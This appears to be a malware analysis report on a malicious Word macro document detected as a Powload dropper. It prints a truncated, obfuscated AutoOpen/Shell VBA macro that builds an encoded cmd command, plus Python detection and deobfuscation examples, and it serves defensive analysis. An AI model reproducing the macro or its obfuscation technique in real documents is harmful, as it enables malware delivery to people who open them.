Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 984c49fda112dda5…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 83.4 KB
Created: 2018-08-29 04:11:00
Authoring application: Microsoft Office Word
First seen: 2020-04-06
MD5: 32a4bbf15c9ec2184510b0a0fa5c7ecf
SHA-1: 87594fc3dc29e4e62a9a2abc8c5468162e8033ab
SHA-256: 984c49fda112dda53cd00dae650b747bad823faf1e8dc5140fc3834ff4a31e5b
Risk score: 242

Heuristics (7)

  • ClamAV: Doc.Dropper.Powload-6665713-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Powload-6665713-0
  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    The VBA source calls Shell(), which starts an external process. Together with the AutoOpen entry point below this is the usual macro-dropper execution path: open the document, run the macro, launch a command.
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    The project defines an AutoOpen macro, which Word runs automatically when the document is opened if macros are enabled.
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (see Extracted artifacts below), so the generic description does not fit; treat this marker as corroborating the AutoOpen finding above rather than as independent evidence.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace URI that Office writes into embedded drawing parts; it is not a download or command-and-control address and should not be recorded as an indicator of compromise.
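The p-code heuristic above is a co-occurrence rule: an auto-execution entry point and an execution/download token must both be present. The following Python is an added example of that rule, not the analysis platform's own code; its token lists are assumed (the platform's real lists are not on this page), it assumes the token names appear as ASCII or UTF-16LE byte strings somewhere in the inspected stream, and the four sample streams are constructed for the example rather than taken from the analysed file.

```python
"""
Co-occurrence rule of the kind described by OLE_VBA_PCODE_AUTOEXEC_EXEC:
a VBA-related stream is flagged only when an auto-execution entry point
and an execution/download token are both present. Tokens are searched in
ASCII and in UTF-16LE so the check still fires on compiled p-code or
identifier-table bytes when no readable source could be decoded.
Added example; the token lists below are assumptions, not the platform's.
"""
import re

AUTOEXEC_TOKENS = ["AutoOpen", "AutoExec", "AutoClose", "Document_Open",
                   "Workbook_Open", "Auto_Open"]
EXEC_TOKENS = ["Shell", "WScript.Shell", "CreateObject", "URLDownloadToFile",
               "powershell", "cmd /", "ShellExecute"]


def _compile(tokens):
    """One case-insensitive pattern per token, matching its ASCII or UTF-16LE form."""
    out = []
    for tok in tokens:
        narrow = re.escape(tok.encode("ascii"))
        wide = re.escape(tok.encode("utf-16-le"))
        out.append((tok, re.compile(b"(?:" + narrow + b"|" + wide + b")", re.I)))
    return out


_AUTOEXEC = _compile(AUTOEXEC_TOKENS)
_EXEC = _compile(EXEC_TOKENS)


def find_tokens(stream, patterns):
    """Names of the tokens from `patterns` that occur anywhere in `stream`."""
    return sorted(tok for tok, pat in patterns if pat.search(stream))


def check_autoexec_exec(stream):
    """Apply the rule: 'hit' only if an auto-exec token and an exec token co-occur."""
    auto = find_tokens(stream, _AUTOEXEC)
    execs = find_tokens(stream, _EXEC)
    return {"autoexec": auto, "exec": execs, "hit": bool(auto and execs)}


# Constructed sample streams (not taken from the analysed file).
SOURCE_STREAM = b'Sub AutoOpen()\r\n    Shell kMYCL(), vbHide\r\nEnd Sub\r\n'
# No source text at all: only identifier-table-like UTF-16LE names among binary.
PCODE_LIKE_STREAM = (b"\x00\x01\xfe\x02" + "AutoOpen".encode("utf-16-le")
                     + b"\x00\x00\x07\x19" + "Shell".encode("utf-16-le") + b"\xff")
BENIGN_AUTOOPEN_STREAM = b'Sub AutoOpen()\r\n    MsgBox "welcome"\r\nEnd Sub\r\n'
SHELL_ONLY_STREAM = b'Sub Helper()\r\n    Shell "calc.exe"\r\nEnd Sub\r\n'

if __name__ == "__main__":
    for name, data in [("source", SOURCE_STREAM), ("pcode-like", PCODE_LIKE_STREAM),
                       ("benign", BENIGN_AUTOOPEN_STREAM), ("shell-only", SHELL_ONLY_STREAM)]:
        print(name, check_autoexec_exec(data))
```

The last two samples show why the rule needs both classes: an AutoOpen that only shows a message box is not flagged, and a Shell token with no auto-execution entry point is not either. On a real file the check would run over each VBA-related stream of the OLE container, and a hit is a reason to decompile the p-code, not a verdict on its own.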

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10951 bytes
SHA-256: be58349c516503363f3812655b9560926726e9088d5463dd66e2eda976b6491a
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "drFIsELsAojF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "nvBmKkjw"
Function kMYCL()

On _
Error _
Resume _
Next
Hour bLPiRD / SSZTJ
   Hour 91922 / QUiqr
   Hour VIsGz / JZDAaH * UwdvsS * RRGza
lCcUWj = "md /V" + ":O" + "N/C" + Chr(0 + 5 + 0 + 4 + 25) + "^s" + "e^t ch^"
Hour 15974 / knMjwN / tzwtd / 39411
   Hour YUmZGE * ufStE * jWkQC / URfJBU
   Hour 20298 * FOFMWZ
   Hour DSoca / jQXzQ / 67794 * pDHWPc
   Hour 97226 / XGXlVX
PjVWOzh = "g^S==^" + "=^AA" + "g" + "A^A^" + "IA" + "^AC" + "^AgAA" + "^I^AA" + "C^A^g" + "^AAIA" + "^AC^" + "A"
Hour iDPPGv / zSMaW
   Hour 33468 * kmqTo
   Hour 90707 * VPRfv * 68293 / FuKVc
djEVCtCIh = "g" + "AA^IAAC" + "^A^gAA" + "IAACAg^" + "AAIA^" + "0HA^" + "9" + "B^w^e^" + "A^g" + "^GAj^" + "B^A^dA" + "^E"
Hour 86666 * pjNOln
   Hour 90523 * orWop
   Hour 60286 / lXNDv / JZwVF / SHhJcn
jijiXY = "^G^A^j^" + "BQ" + "^fAs^" + "DArBQ^" + "YAU^G^" + "Ay^BgY" + "^A"
Hour 88788 / GUqYK
   Hour 89468 * qWJOXI * rXcfEI * 328
IMnCrhO = "sD^" + "AN^" + "B^" + "g^Q" + "^Ac^F^A" + "kA" + "^A" + "^I^A^" + "0" + "^GA^l" + "B^AdA" + "^kE^A" + "t^A"
kMYCL = lCcUWj + PjVWOzh + djEVCtCIh + jijiXY + IMnCrhO
   Hour wfrOFH / fdPkuu
   Hour 76154 * 29712 * wJlsRi / wSjrpL
End Function
Function aUUvUjfhjaa()

On _
Error _
Resume _
Next
Hour aNODS * 71028
   Hour 79106 / DzwEf / 95667 / RnXwp
   Hour 43534 * ttDzdi
hBznp = "^" + "Q" + "ZA^s" + "G" + "AvB^g" + "^d^" + "A" + "4G^AJ" + "B^w"
Hour 46120 * TjZMbL / OJXoiz * 79666
riRVUR = "^OAk" + "CAN^" + "B^" + "g^QAc" + "FAk^A^" + "AIAw" + "C^AvBge" + "A^I^FA" + "k^A^AK^" + "A^U^G^"
Hour zCNGW / QuBzra
   Hour SwpVGK * wBIRaN
   Hour 52249 / fJJuSc / 73534 * EkuHJi
oKHuRS = "As^BQ^" + "a^A^" + "YE" + "^AkB^" + "QYA^8G" + "^As^" + "B^g^bAc" + "H^Av^"
Hour wEwpf * hXLKI
   Hour 21243 / fcSIP / KvCKV * BBsOdK
   Hour 52748 * HQizZd * FiUcN / JLLiCw
BqwZI = "BAR" + "A^4C^AG" + "B" + "w" + "V^A^EE" + "AkAw^e^" + "Ak^H"
Hour 49710 * NSRXMz / GazPCk * hROlv
   Hour 35286 / rRIJT * YlRUf * PAqsF
FAuuZS = "^" + "AyB^A^d" + "^A^sH" + "A^pA^" + "w" + "dA^0" + "E^AxB^" + "A^JA^" + "AC^A^uB" + "^Q^aAAC" + "^Av^B^" + "ge" + "^A"
Hour 99082 * avKYpP
   Hour kYMzRm / 63026 * wburL * azPCjQ
   Hour 48800 / qSZqcD * 58799 * OvsRbi
   Hour IsjjM * 80488
   Hour fuXiqh / VfkTVh
RCLLQMPO = "IF^" + "Ak^A^" + "AKAgG" + "AjB" + "QYAU^G"
Hour 12651 / zhVwq
   Hour rXHjtc / UHlbo * 63313 * kjaPu
KPjil = "A^yBw^" + "b^AYGA" + "7A^wJAU" + "GA^4BQ" + "^ZA" + "^4C^An" + "A^w^" + "KA^o^H" + "^ArBA" + "c^A^QC"
Hour DSwWt * RtzCvs * YrCjSD * iijGZ
   Hour CNoYso * 35652 * 23985 / YicLLT
   Hour zuivG * pUpnX
KRVXYMLTQ = "ArAwJ^" + "AwF" + "AnA" + "w^KAM^" + "GA" + "^p" + "BAb^A" + "^IGA1" + "^B^" + "A" + "cA^o^D"
aUUvUjfhjaa = hBznp + riRVUR + oKHuRS + BqwZI + FAuuZS + RCLLQMPO + KPjil + KRVXYMLTQ
   Hour 80108 * tQUzOG
   Hour 6987 / apKhOZ
   Hour 64104 / FWATu * 16804 * 42530
   Hour BDCPJ / cCUqHO
End Function
Function PsHipAL()

On _
Error _
Resume _
Next
Hour QpKVQ * PNbaLz * MYVPd * SmLiIz
   Hour 1158 / rpzRot * 35745 / QpvUzO
   Hour iQIvZ * TQUBTE
   Hour 30713 / IwRjtR
   Hour 29996 / IpIYs * JziibL / OPcOn
iKchszqQL = "^A2" + "B" + "^gb^A^" + "U^G" + "^A^kA^" + "Q" + "^PA" + "0^EAC" + "^B^" + "wVA^Q" + "C^A" + "7^Aw^J"
Hour RZjcE * 34572
   Hour 41224 / wnZNiO * QbbrA * oFiBpq
   Hour 66467 * 86086
   Hour 57366 / jEahcT
   Hour 42565 * sYWmbu
QAKvfmzEtw = "A^" + "A" + "^" + "DA3A^" + "QMA" + "cCAg"
Hour 71561 * 56671 / CcEbAD * cikmj
   Hour tcmCoG * QszXEf / 10858 * GQArfY
zbajWvz = "^AQ^P^A" + "^A" + "CA6" + "^B^wa^A" + "A^HAk^A" + "wOA^kC^" + "An^AA" + "QAcC" + "^A^oAA^" + "d^AkG^A" + "s^B^Ac^" + "A^M^F" + "^AuA^w^"
Hour qQGOqJ / ldWpr
   Hour bzVDa / MVOpl * 88932 / XhsDoi
   Hour 88155 / iaVkAn
   Hour 41479 / 31778
HsqjPUDF = "J^" + "AQ
... (truncated)
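The extracted macro builds its payload from many short string fragments, hides a double quote as Chr(0 + 5 + 0 + 4 + 25) (that is, Chr(34)), pads each function with no-op Hour x / y statements that only survive because of On Error Resume Next, and litters the text with cmd.exe caret (^) escapes, which cmd removes at parse time. The following Python is an added example, not code from the report or the analysis tool: it evaluates the string concatenations inside each Function and then strips the carets, recovering what kMYCL() returns. SAMPLE_VBA is a constructed excerpt of kMYCL() from the preview above; only the literal / Chr(n) / variable forms seen in this macro are modelled.

```python
"""Recover the command the extracted macro builds: evaluate the "a" + "b" + Chr(n)
concatenations inside each Function, then strip the cmd.exe caret (^) escapes.
Added example, not from the report or the analysis tool."""
import ast
import operator
import re

# Constructed excerpt of kMYCL() from the macros.bas preview above (most of the
# no-op "Hour x / y" filler is omitted; one line is kept to show it is ignored).
SAMPLE_VBA = r'''
Function kMYCL()
On _
Error _
Resume _
Next
Hour bLPiRD / SSZTJ
lCcUWj = "md /V" + ":O" + "N/C" + Chr(0 + 5 + 0 + 4 + 25) + "^s" + "e^t ch^"
PjVWOzh = "g^S==^" + "=^AA" + "g" + "A^A^" + "IA" + "^AC" + "^AgAA" + "^I^AA" + "C^A^g" + "^AAIA" + "^AC^" + "A"
djEVCtCIh = "g" + "AA^IAAC" + "^A^gAA" + "IAACAg^" + "AAIA^" + "0HA^" + "9" + "B^w^e^" + "A^g" + "^GAj^" + "B^A^dA" + "^E"
jijiXY = "^G^A^j^" + "BQ" + "^fAs^" + "DArBQ^" + "YAU^G^" + "Ay^BgY" + "^A"
IMnCrhO = "sD^" + "AN^" + "B^" + "g^Q" + "^Ac^F^A" + "kA" + "^A" + "^I^A^" + "0" + "^GA^l" + "B^AdA" + "^kE^A" + "t^A"
kMYCL = lCcUWj + PjVWOzh + djEVCtCIh + jijiXY + IMnCrhO
End Function
'''

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul, ast.Div: operator.truediv}
_FUNC_RE = re.compile(r"(?<!End )Function\s+(\w+)\s*\(\)(.*?)End Function", re.S)
_ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")
# Terms of a string-building expression: "literal" (with "" for an embedded quote),
# Chr(arith), or a variable name. Everything else (the '+' operators) is skipped.
_TERM_RE = re.compile(r'"(?:[^"]|"")*"|Chr\s*\([^)]*\)|[A-Za-z_]\w*', re.I)


def _arith(expr):
    """Evaluate the integer arithmetic hidden inside Chr(...) without eval()."""
    def walk(n):
        if isinstance(n, ast.Constant) and isinstance(n.value, (int, float)):
            return n.value
        if isinstance(n, ast.BinOp) and type(n.op) in _OPS:
            return _OPS[type(n.op)](walk(n.left), walk(n.right))
        raise ValueError("unsupported arithmetic in Chr(): " + expr)
    return walk(ast.parse(expr.strip(), mode="eval").body)


def _build_string(rhs, env):
    """Concatenate the literal, Chr(n) and variable terms of one expression."""
    parts = []
    for term in _TERM_RE.findall(rhs):
        if term[0] == '"':
            parts.append(term[1:-1].replace('""', '"'))
        elif term.endswith(")"):
            parts.append(chr(int(_arith(term[term.index("(") + 1:-1]))))
        else:
            parts.append(env.get(term, ""))   # unassigned Variant concatenates as ""
    return "".join(parts)


def evaluate_string_builders(vba_src):
    """{function_name: raw value} for each Function that assigns its own name."""
    src = re.sub(r"[ \t]+_\r?\n", " ", vba_src)   # join VBA line continuations
    results = {}
    for name, body in _FUNC_RE.findall(src):
        env = {}
        for line in body.splitlines():
            m = _ASSIGN_RE.match(line)   # "Hour x / y" and On Error lines: no '='
            if m:
                env[m.group(1)] = _build_string(m.group(2), env)
        if name in env:
            results[name] = env[name]
    return results


def strip_cmd_carets(s):
    """Undo cmd.exe escaping: '^X' -> 'X' (so '^^' -> '^'); a trailing '^' is dropped."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^":
            if i + 1 < len(s):
                out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def deobfuscate(vba_src):
    """Caret-stripped command per string-building function."""
    return {n: strip_cmd_carets(v) for n, v in evaluate_string_builders(vba_src).items()}
```

On the excerpt, deobfuscate(SAMPLE_VBA)["kMYCL"] begins `md /V:ON/C"set chgS===AAgAAIAAC`: a cmd /V:ON invocation (delayed environment-variable expansion) that stores a long value in a variable named chgS. The leading "c" of cmd is not in this function (the literal starts "md /V"), so a caller outside the visible lines must prepend it. The value starts with "==" and is built from repeating groups such as AAIAAC, which is what a base64 string written backwards looks like, a construction consistent with the Powload family ClamAV names; the remaining functions (aUUvUjfhjaa, PsHipAL, and whatever follows the truncation) supply further fragments, so the full command cannot be reconstructed from this page. Running the same code over the complete macros.bas would return one entry per string-building function.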